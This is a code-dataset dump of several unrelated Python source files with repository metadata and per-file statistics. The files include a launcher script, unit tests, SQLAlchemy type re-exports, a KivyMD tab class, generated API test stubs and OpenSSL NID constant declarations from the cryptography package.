5f685616221e3261afe0d8ae8506cad9a719fa82
|
[
"MIT"
] | null | null | null |
start.py
|
albertvisser/probreg
|
5f685616221e3261afe0d8ae8506cad9a719fa82
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
"""Startprogramma voor probreg gui versie
"""
import sys
from probreg.main import main
if len(sys.argv) > 1:
main(sys.argv[1])
else:
main()
| 17.2
| 41
| 0.680233
| 27
| 172
| 4.333333
| 0.666667
| 0.119658
| 0.136752
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021127
| 0.174419
| 172
| 9
| 42
| 19.111111
| 0.802817
| 0.354651
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
7194ea956252f214b9b7387cefdd32e16e25f906
| 1,590
|
py
|
Python
|
bcftbx/test/cli/test_annotate_probesets.py
|
fls-bioinformatics-core/genomics
|
1cd012faf69fff284f8f68ede050ffe30ac3327d
|
[
"AFL-3.0"
] | 49
|
2015-01-03T17:09:10.000Z
|
2022-03-17T19:28:08.000Z
|
bcftbx/test/cli/test_annotate_probesets.py
|
fls-bioinformatics-core/genomics
|
1cd012faf69fff284f8f68ede050ffe30ac3327d
|
[
"AFL-3.0"
] | 59
|
2015-04-16T14:21:04.000Z
|
2022-03-15T11:56:33.000Z
|
bcftbx/test/cli/test_annotate_probesets.py
|
fls-bioinformatics-core/genomics
|
1cd012faf69fff284f8f68ede050ffe30ac3327d
|
[
"AFL-3.0"
] | 29
|
2015-01-29T08:50:44.000Z
|
2021-08-19T02:15:44.000Z
|
#######################################################################
# Tests
#######################################################################
import unittest
from bcftbx.cli.annotate_probesets import get_probeset_extension
class TestProbesetAnnotation(unittest.TestCase):
def test_get_basic_probeset_extension(self):
"""Check that the correct probeset extensions are identified
"""
self.assertEqual(get_probeset_extension('123356_at'),'_at')
self.assertEqual(get_probeset_extension('123356_st'),'_st')
self.assertEqual(get_probeset_extension('123356_s_at'),'_s_at')
self.assertEqual(get_probeset_extension('123356_a_at'),'_a_at')
self.assertEqual(get_probeset_extension('123356_x_at'),'_x_at')
self.assertEqual(get_probeset_extension('123356_g_at'),'_g_at')
self.assertEqual(get_probeset_extension('123356_f_at'),'_f_at')
self.assertEqual(get_probeset_extension('123356_i_at'),'_i_at')
self.assertEqual(get_probeset_extension('123356_b_at'),'_b_at')
self.assertEqual(get_probeset_extension('123356_l_at'),'_l_at')
self.assertEqual(get_probeset_extension('123356'),None)
def test_get_tricky_probeset_extension(self):
"""Check the correct extensions are identified in tricker cases
"""
self.assertEqual(get_probeset_extension('123356b_at'),'_at')
def test_get_probeset_extension_r(self):
"""Check that the _r_ component overrules other extensions
"""
self.assertEqual(get_probeset_extension('123356_r_at'),'_r_')
| 46.764706
| 71
| 0.665409
| 182
| 1,590
| 5.346154
| 0.258242
| 0.29702
| 0.308325
| 0.347379
| 0.560123
| 0.524152
| 0.397739
| 0
| 0
| 0
| 0
| 0.057269
| 0.143396
| 1,590
| 33
| 72
| 48.181818
| 0.657122
| 0.130818
| 0
| 0
| 0
| 0
| 0.151144
| 0
| 0
| 0
| 0
| 0
| 0.684211
| 1
| 0.157895
| false
| 0
| 0.105263
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
719b05018ec53f21f5b2fc74db39c9aad85a1eee
| 3,322
|
py
|
Python
|
lib/sqlalchemy/types.py
|
Dreamsorcerer/sqlalchemy
|
153671df9d4cd7f2cdb3e14e6221f529269885d9
|
[
"MIT"
] | 6
|
2019-02-18T12:42:44.000Z
|
2020-11-11T23:10:17.000Z
|
lib/sqlalchemy/types.py
|
Dreamsorcerer/sqlalchemy
|
153671df9d4cd7f2cdb3e14e6221f529269885d9
|
[
"MIT"
] | 1
|
2020-07-20T13:23:44.000Z
|
2020-07-20T13:23:44.000Z
|
lib/sqlalchemy/types.py
|
Dreamsorcerer/sqlalchemy
|
153671df9d4cd7f2cdb3e14e6221f529269885d9
|
[
"MIT"
] | 2
|
2021-06-12T01:38:00.000Z
|
2021-09-05T21:18:29.000Z
|
# types.py
# Copyright (C) 2005-2020 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Compatibility namespace for sqlalchemy.sql.types.
"""
__all__ = [
"TypeEngine",
"TypeDecorator",
"UserDefinedType",
"INT",
"CHAR",
"VARCHAR",
"NCHAR",
"NVARCHAR",
"TEXT",
"Text",
"FLOAT",
"NUMERIC",
"REAL",
"DECIMAL",
"TIMESTAMP",
"DATETIME",
"CLOB",
"BLOB",
"BINARY",
"VARBINARY",
"BOOLEAN",
"BIGINT",
"SMALLINT",
"INTEGER",
"DATE",
"TIME",
"String",
"Integer",
"SmallInteger",
"BigInteger",
"Numeric",
"Float",
"DateTime",
"Date",
"Time",
"LargeBinary",
"Boolean",
"Unicode",
"Concatenable",
"UnicodeText",
"PickleType",
"Interval",
"Enum",
"Indexable",
"ARRAY",
"JSON",
]
from .sql.sqltypes import _Binary # noqa
from .sql.sqltypes import ARRAY # noqa
from .sql.sqltypes import BIGINT # noqa
from .sql.sqltypes import BigInteger # noqa
from .sql.sqltypes import BINARY # noqa
from .sql.sqltypes import BLOB # noqa
from .sql.sqltypes import BOOLEAN # noqa
from .sql.sqltypes import Boolean # noqa
from .sql.sqltypes import CHAR # noqa
from .sql.sqltypes import CLOB # noqa
from .sql.sqltypes import Concatenable # noqa
from .sql.sqltypes import DATE # noqa
from .sql.sqltypes import Date # noqa
from .sql.sqltypes import DATETIME # noqa
from .sql.sqltypes import DateTime # noqa
from .sql.sqltypes import DECIMAL # noqa
from .sql.sqltypes import Enum # noqa
from .sql.sqltypes import FLOAT # noqa
from .sql.sqltypes import Float # noqa
from .sql.sqltypes import Indexable # noqa
from .sql.sqltypes import INT # noqa
from .sql.sqltypes import INTEGER # noqa
from .sql.sqltypes import Integer # noqa
from .sql.sqltypes import Interval # noqa
from .sql.sqltypes import JSON # noqa
from .sql.sqltypes import LargeBinary # noqa
from .sql.sqltypes import MatchType # noqa
from .sql.sqltypes import NCHAR # noqa
from .sql.sqltypes import NULLTYPE # noqa
from .sql.sqltypes import NullType # noqa
from .sql.sqltypes import NUMERIC # noqa
from .sql.sqltypes import Numeric # noqa
from .sql.sqltypes import NVARCHAR # noqa
from .sql.sqltypes import PickleType # noqa
from .sql.sqltypes import REAL # noqa
from .sql.sqltypes import SchemaType # noqa
from .sql.sqltypes import SMALLINT # noqa
from .sql.sqltypes import SmallInteger # noqa
from .sql.sqltypes import String # noqa
from .sql.sqltypes import STRINGTYPE # noqa
from .sql.sqltypes import TEXT # noqa
from .sql.sqltypes import Text # noqa
from .sql.sqltypes import TIME # noqa
from .sql.sqltypes import Time # noqa
from .sql.sqltypes import TIMESTAMP # noqa
from .sql.sqltypes import Unicode # noqa
from .sql.sqltypes import UnicodeText # noqa
from .sql.sqltypes import VARBINARY # noqa
from .sql.sqltypes import VARCHAR # noqa
from .sql.type_api import adapt_type # noqa
from .sql.type_api import to_instance # noqa
from .sql.type_api import TypeDecorator # noqa
from .sql.type_api import TypeEngine # noqa
from .sql.type_api import UserDefinedType # noqa
from .sql.type_api import Variant # noqa
| 28.637931
| 69
| 0.69988
| 426
| 3,322
| 5.42723
| 0.199531
| 0.166522
| 0.25692
| 0.445069
| 0.642301
| 0.413495
| 0.351211
| 0.351211
| 0.351211
| 0.351211
| 0
| 0.003005
| 0.198676
| 3,322
| 115
| 70
| 28.886957
| 0.865515
| 0.162854
| 0
| 0
| 0
| 0
| 0.119056
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.533981
| 0
| 0.533981
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
71a90e4a7f809e73157b7c36c4db9ed5cec153ed
| 201
|
py
|
Python
|
libs/applibs/templates/tab/tab_one.py
|
leoobrabo/KivyMD-Project-Creator
|
13b4dd7dd9d88164af052ad91009bfd38660c27b
|
[
"MIT"
] | 51
|
2020-12-15T21:29:25.000Z
|
2022-03-31T11:41:38.000Z
|
libs/applibs/templates/tab/tab_one.py
|
leoobrabo/KivyMD-Project-Creator
|
13b4dd7dd9d88164af052ad91009bfd38660c27b
|
[
"MIT"
] | 8
|
2020-12-23T21:40:12.000Z
|
2021-10-04T11:57:16.000Z
|
libs/applibs/templates/tab/tab_one.py
|
Kulothungan16/KivyMD_Project_Creator
|
f96f1128800b19de4ad5941270fc2cfdbbbcf331
|
[
"MIT"
] | 14
|
2021-01-02T04:08:53.000Z
|
2022-02-15T19:36:59.000Z
|
from kivy.uix.floatlayout import FloatLayout
from kivymd.uix.tab import MDTabsBase
import utils
utils.load_kv("tab_one.kv")
class TabOne(FloatLayout, MDTabsBase):
"""
Tab Item One.
"""
| 15.461538
| 44
| 0.721393
| 27
| 201
| 5.296296
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174129
| 201
| 12
| 45
| 16.75
| 0.861446
| 0.064677
| 0
| 0
| 0
| 0
| 0.05814
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
71b4acb45792997110467999c5f1ef1345bdf700
| 2,430
|
py
|
Python
|
test/test_document_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
test/test_document_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
test/test_document_api.py
|
labinnovationdocapost/leia-api-python-sdk
|
6001dce68362d4e836b57e52d4da17710f25ed12
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
LEIA RESTful API for AI
Leia API # noqa: E501
OpenAPI spec version: 1.0.0
Contact:
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import leiaapi.generated
from leiaapi.generated.api.document_api import DocumentApi # noqa: E501
from leiaapi.generated.rest import ApiException
class TestDocumentApi(unittest.TestCase):
"""DocumentApi unit test stubs"""
def setUp(self):
self.api = DocumentApi() # noqa: E501
def tearDown(self):
pass
def test_create_document(self):
"""Test case for create_document
Uploads a document to the Leia API # noqa: E501
"""
pass
def test_delete_document(self):
"""Test case for delete_document
Deletes a document from Leia API # noqa: E501
"""
pass
def test_edit_document(self):
"""Test case for edit_document
Updates a document in Leia API # noqa: E501
"""
pass
def test_get_document(self):
"""Test case for get_document
Retrieves a document from Leia API # noqa: E501
"""
pass
def test_get_document_contents(self):
"""Test case for get_document_contents
Retrieves a document from Leia API # noqa: E501
"""
pass
def test_get_documents(self):
"""Test case for get_documents
Retrieves documents from Leia API (paginated) # noqa: E501
"""
pass
def test_get_documents_tags(self):
"""Test case for get_documents_tags
Retrieves documents' tags from Leia API # noqa: E501
"""
pass
def test_get_documents_zip(self):
"""Test case for get_documents_zip
Retrieves documents from Leia API (paginated) # noqa: E501
"""
pass
def test_tag_document(self):
"""Test case for tag_document
Tags a document # noqa: E501
"""
pass
def test_transform_document_async(self):
"""Test case for transform_document_async
Asynchronously converts a document within Leia API # noqa: E501
"""
pass
def test_untag_document(self):
"""Test case for untag_document
Untags an document # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 21.891892
| 72
| 0.616049
| 293
| 2,430
| 4.921502
| 0.255973
| 0.07767
| 0.083911
| 0.114424
| 0.472954
| 0.380028
| 0.287795
| 0.243412
| 0.243412
| 0.212205
| 0
| 0.027284
| 0.306173
| 2,430
| 110
| 73
| 22.090909
| 0.827995
| 0.455556
| 0
| 0.352941
| 1
| 0
| 0.007648
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.382353
| false
| 0.352941
| 0.147059
| 0
| 0.558824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 4
|
71be0fd9b196eac8f333a08469b0a799a94fdd2a
| 64
|
py
|
Python
|
sqs_polling/__init__.py
|
ohke/sqs-polling
|
858322126632da897a8911a484b0dd3980c23ca1
|
[
"MIT"
] | 5
|
2019-12-08T05:55:32.000Z
|
2022-02-05T21:19:19.000Z
|
sqs_polling/__init__.py
|
ohke/sqs-polling
|
858322126632da897a8911a484b0dd3980c23ca1
|
[
"MIT"
] | 5
|
2019-10-25T00:04:50.000Z
|
2021-11-13T21:15:55.000Z
|
sqs_polling/__init__.py
|
ohke/sqs-polling
|
858322126632da897a8911a484b0dd3980c23ca1
|
[
"MIT"
] | 2
|
2019-10-24T23:29:40.000Z
|
2021-07-14T10:24:18.000Z
|
from .sqs_polling import sqs_polling
__all__ = ["sqs_polling"]
| 16
| 36
| 0.78125
| 9
| 64
| 4.777778
| 0.555556
| 0.697674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 64
| 3
| 37
| 21.333333
| 0.767857
| 0
| 0
| 0
| 0
| 0
| 0.171875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
71d8e2809974cdd222385de62649d000e5f2b1a9
| 175
|
py
|
Python
|
media_security/urls.py
|
ss-aman/media_security
|
cd9be8c4d9cfeb4344b682b3a6c90eda620daaec
|
[
"MIT"
] | null | null | null |
media_security/urls.py
|
ss-aman/media_security
|
cd9be8c4d9cfeb4344b682b3a6c90eda620daaec
|
[
"MIT"
] | null | null | null |
media_security/urls.py
|
ss-aman/media_security
|
cd9be8c4d9cfeb4344b682b3a6c90eda620daaec
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.conf.urls.static import static
from .views import MediaView
urlpatterns = static(settings.MEDIA_URL, view=MediaView.as_view())
| 21.875
| 66
| 0.811429
| 25
| 175
| 5.6
| 0.56
| 0.142857
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108571
| 175
| 7
| 67
| 25
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
71dd92081875ae813a58400cfadfd10cfd87b51f
| 32
|
py
|
Python
|
modules/2.79/bpy/types/EnumPropertyItem.py
|
cmbasnett/fake-bpy-module
|
acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55
|
[
"MIT"
] | null | null | null |
modules/2.79/bpy/types/EnumPropertyItem.py
|
cmbasnett/fake-bpy-module
|
acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55
|
[
"MIT"
] | null | null | null |
modules/2.79/bpy/types/EnumPropertyItem.py
|
cmbasnett/fake-bpy-module
|
acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55
|
[
"MIT"
] | null | null | null |
EnumPropertyItem.value = None
| 8
| 29
| 0.78125
| 3
| 32
| 8.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 32
| 3
| 30
| 10.666667
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
e0990d13d566478218153e5175b692168716a36c
| 56
|
py
|
Python
|
Python/Tests/GlassTests/PythonTests/Python/StepPythonToNative_Repr/py_mod.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 404
|
2019-05-07T02:21:57.000Z
|
2022-03-31T17:03:04.000Z
|
Python/Tests/GlassTests/PythonTests/Python/StepPythonToNative_Repr/py_mod.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 1,672
|
2019-05-06T21:09:38.000Z
|
2022-03-31T23:16:04.000Z
|
Python/Tests/GlassTests/PythonTests/Python/StepPythonToNative_Repr/py_mod.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 186
|
2019-05-13T03:17:37.000Z
|
2022-03-31T16:24:05.000Z
|
import cpp_mod
cpp_obj = cpp_mod.CppObj()
repr(cpp_obj)
| 14
| 26
| 0.785714
| 11
| 56
| 3.636364
| 0.545455
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 56
| 3
| 27
| 18.666667
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
e0b22856c8a14733888f373b9d1e3ace06dbf9fd
| 192
|
py
|
Python
|
np/__init__.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
np/__init__.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
np/__init__.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
"""
Documentation of some native numpy functions when called on Galois field arrays.
"""
from . import linalg
from .arithmetic import *
from .functions import *
from .linear_algebra import *
| 21.333333
| 80
| 0.765625
| 25
| 192
| 5.84
| 0.72
| 0.136986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161458
| 192
| 8
| 81
| 24
| 0.906832
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
e0d8fbec1ac257972e25b02c261472da625f4d33
| 8,565
|
py
|
Python
|
resource/pypi/cryptography-1.7.1/src/_cffi_src/openssl/nid.py
|
hipnusleo/Laserjet
|
f53e0b740f48f2feb0c0bb285ec6728b313b4ccc
|
[
"Apache-2.0"
] | null | null | null |
resource/pypi/cryptography-1.7.1/src/_cffi_src/openssl/nid.py
|
hipnusleo/Laserjet
|
f53e0b740f48f2feb0c0bb285ec6728b313b4ccc
|
[
"Apache-2.0"
] | null | null | null |
resource/pypi/cryptography-1.7.1/src/_cffi_src/openssl/nid.py
|
hipnusleo/Laserjet
|
f53e0b740f48f2feb0c0bb285ec6728b313b4ccc
|
[
"Apache-2.0"
] | null | null | null |
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/obj_mac.h>
"""
TYPES = """
static const int NID_undef;
static const int NID_dsa;
static const int NID_dsaWithSHA;
static const int NID_dsaWithSHA1;
static const int NID_md2;
static const int NID_md4;
static const int NID_md5;
static const int NID_mdc2;
static const int NID_ripemd160;
static const int NID_sha;
static const int NID_sha1;
static const int NID_sha256;
static const int NID_sha384;
static const int NID_sha512;
static const int NID_sha224;
static const int NID_sha;
static const int NID_ecdsa_with_SHA1;
static const int NID_ecdsa_with_SHA224;
static const int NID_ecdsa_with_SHA256;
static const int NID_ecdsa_with_SHA384;
static const int NID_ecdsa_with_SHA512;
static const int NID_pbe_WithSHA1And3_Key_TripleDES_CBC;
static const int NID_X9_62_c2pnb163v1;
static const int NID_X9_62_c2pnb163v2;
static const int NID_X9_62_c2pnb163v3;
static const int NID_X9_62_c2pnb176v1;
static const int NID_X9_62_c2tnb191v1;
static const int NID_X9_62_c2tnb191v2;
static const int NID_X9_62_c2tnb191v3;
static const int NID_X9_62_c2onb191v4;
static const int NID_X9_62_c2onb191v5;
static const int NID_X9_62_c2pnb208w1;
static const int NID_X9_62_c2tnb239v1;
static const int NID_X9_62_c2tnb239v2;
static const int NID_X9_62_c2tnb239v3;
static const int NID_X9_62_c2onb239v4;
static const int NID_X9_62_c2onb239v5;
static const int NID_X9_62_c2pnb272w1;
static const int NID_X9_62_c2pnb304w1;
static const int NID_X9_62_c2tnb359v1;
static const int NID_X9_62_c2pnb368w1;
static const int NID_X9_62_c2tnb431r1;
static const int NID_X9_62_prime192v1;
static const int NID_X9_62_prime192v2;
static const int NID_X9_62_prime192v3;
static const int NID_X9_62_prime239v1;
static const int NID_X9_62_prime239v2;
static const int NID_X9_62_prime239v3;
static const int NID_X9_62_prime256v1;
static const int NID_secp112r1;
static const int NID_secp112r2;
static const int NID_secp128r1;
static const int NID_secp128r2;
static const int NID_secp160k1;
static const int NID_secp160r1;
static const int NID_secp160r2;
static const int NID_sect163k1;
static const int NID_sect163r1;
static const int NID_sect163r2;
static const int NID_secp192k1;
static const int NID_secp224k1;
static const int NID_secp224r1;
static const int NID_secp256k1;
static const int NID_secp384r1;
static const int NID_secp521r1;
static const int NID_sect113r1;
static const int NID_sect113r2;
static const int NID_sect131r1;
static const int NID_sect131r2;
static const int NID_sect193r1;
static const int NID_sect193r2;
static const int NID_sect233k1;
static const int NID_sect233r1;
static const int NID_sect239k1;
static const int NID_sect283k1;
static const int NID_sect283r1;
static const int NID_sect409k1;
static const int NID_sect409r1;
static const int NID_sect571k1;
static const int NID_sect571r1;
static const int NID_wap_wsg_idm_ecid_wtls1;
static const int NID_wap_wsg_idm_ecid_wtls3;
static const int NID_wap_wsg_idm_ecid_wtls4;
static const int NID_wap_wsg_idm_ecid_wtls5;
static const int NID_wap_wsg_idm_ecid_wtls6;
static const int NID_wap_wsg_idm_ecid_wtls7;
static const int NID_wap_wsg_idm_ecid_wtls8;
static const int NID_wap_wsg_idm_ecid_wtls9;
static const int NID_wap_wsg_idm_ecid_wtls10;
static const int NID_wap_wsg_idm_ecid_wtls11;
static const int NID_wap_wsg_idm_ecid_wtls12;
static const int NID_ipsec3;
static const int NID_ipsec4;
static const char *const SN_X9_62_c2pnb163v1;
static const char *const SN_X9_62_c2pnb163v2;
static const char *const SN_X9_62_c2pnb163v3;
static const char *const SN_X9_62_c2pnb176v1;
static const char *const SN_X9_62_c2tnb191v1;
static const char *const SN_X9_62_c2tnb191v2;
static const char *const SN_X9_62_c2tnb191v3;
static const char *const SN_X9_62_c2onb191v4;
static const char *const SN_X9_62_c2onb191v5;
static const char *const SN_X9_62_c2pnb208w1;
static const char *const SN_X9_62_c2tnb239v1;
static const char *const SN_X9_62_c2tnb239v2;
static const char *const SN_X9_62_c2tnb239v3;
static const char *const SN_X9_62_c2onb239v4;
static const char *const SN_X9_62_c2onb239v5;
static const char *const SN_X9_62_c2pnb272w1;
static const char *const SN_X9_62_c2pnb304w1;
static const char *const SN_X9_62_c2tnb359v1;
static const char *const SN_X9_62_c2pnb368w1;
static const char *const SN_X9_62_c2tnb431r1;
static const char *const SN_X9_62_prime192v1;
static const char *const SN_X9_62_prime192v2;
static const char *const SN_X9_62_prime192v3;
static const char *const SN_X9_62_prime239v1;
static const char *const SN_X9_62_prime239v2;
static const char *const SN_X9_62_prime239v3;
static const char *const SN_X9_62_prime256v1;
static const char *const SN_secp112r1;
static const char *const SN_secp112r2;
static const char *const SN_secp128r1;
static const char *const SN_secp128r2;
static const char *const SN_secp160k1;
static const char *const SN_secp160r1;
static const char *const SN_secp160r2;
static const char *const SN_sect163k1;
static const char *const SN_sect163r1;
static const char *const SN_sect163r2;
static const char *const SN_secp192k1;
static const char *const SN_secp224k1;
static const char *const SN_secp224r1;
static const char *const SN_secp256k1;
static const char *const SN_secp384r1;
static const char *const SN_secp521r1;
static const char *const SN_sect113r1;
static const char *const SN_sect113r2;
static const char *const SN_sect131r1;
static const char *const SN_sect131r2;
static const char *const SN_sect193r1;
static const char *const SN_sect193r2;
static const char *const SN_sect233k1;
static const char *const SN_sect233r1;
static const char *const SN_sect239k1;
static const char *const SN_sect283k1;
static const char *const SN_sect283r1;
static const char *const SN_sect409k1;
static const char *const SN_sect409r1;
static const char *const SN_sect571k1;
static const char *const SN_sect571r1;
static const char *const SN_wap_wsg_idm_ecid_wtls1;
static const char *const SN_wap_wsg_idm_ecid_wtls3;
static const char *const SN_wap_wsg_idm_ecid_wtls4;
static const char *const SN_wap_wsg_idm_ecid_wtls5;
static const char *const SN_wap_wsg_idm_ecid_wtls6;
static const char *const SN_wap_wsg_idm_ecid_wtls7;
static const char *const SN_wap_wsg_idm_ecid_wtls8;
static const char *const SN_wap_wsg_idm_ecid_wtls9;
static const char *const SN_wap_wsg_idm_ecid_wtls10;
static const char *const SN_wap_wsg_idm_ecid_wtls11;
static const char *const SN_wap_wsg_idm_ecid_wtls12;
static const char *const SN_ipsec3;
static const char *const SN_ipsec4;
static const int NID_subject_key_identifier;
static const int NID_authority_key_identifier;
static const int NID_policy_constraints;
static const int NID_ext_key_usage;
static const int NID_info_access;
static const int NID_key_usage;
static const int NID_subject_alt_name;
static const int NID_issuer_alt_name;
static const int NID_basic_constraints;
static const int NID_issuing_distribution_point;
static const int NID_certificate_issuer;
static const int NID_name_constraints;
static const int NID_crl_distribution_points;
static const int NID_certificate_policies;
static const int NID_inhibit_any_policy;
static const int NID_private_key_usage_period;
static const int NID_crl_number;
static const int NID_crl_reason;
static const int NID_invalidity_date;
static const int NID_delta_crl;
static const int NID_any_policy;
static const int NID_policy_mappings;
static const int NID_target_information;
static const int NID_no_rev_avail;
static const int NID_commonName;
static const int NID_countryName;
static const int NID_localityName;
static const int NID_stateOrProvinceName;
static const int NID_organizationName;
static const int NID_organizationalUnitName;
static const int NID_serialNumber;
static const int NID_surname;
static const int NID_givenName;
static const int NID_title;
static const int NID_generationQualifier;
static const int NID_dnQualifier;
static const int NID_pseudonym;
static const int NID_domainComponent;
static const int NID_pkcs9_emailAddress;
static const int NID_ad_OCSP;
static const int NID_ad_ca_issuers;
"""
FUNCTIONS = """
"""
MACROS = """
"""
CUSTOMIZATIONS = """
"""
| 37.077922
| 80
| 0.82265
| 1,395
| 8,565
| 4.72043
| 0.143369
| 0.342445
| 0.28489
| 0.345938
| 0.636295
| 0.382536
| 0.24738
| 0.119818
| 0.069704
| 0
| 0
| 0.099973
| 0.139288
| 8,565
| 230
| 81
| 37.23913
| 0.793272
| 0.020198
| 0
| 0.032258
| 0
| 0
| 0.979652
| 0.211694
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004608
| 0
| 0.004608
| 0.004608
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
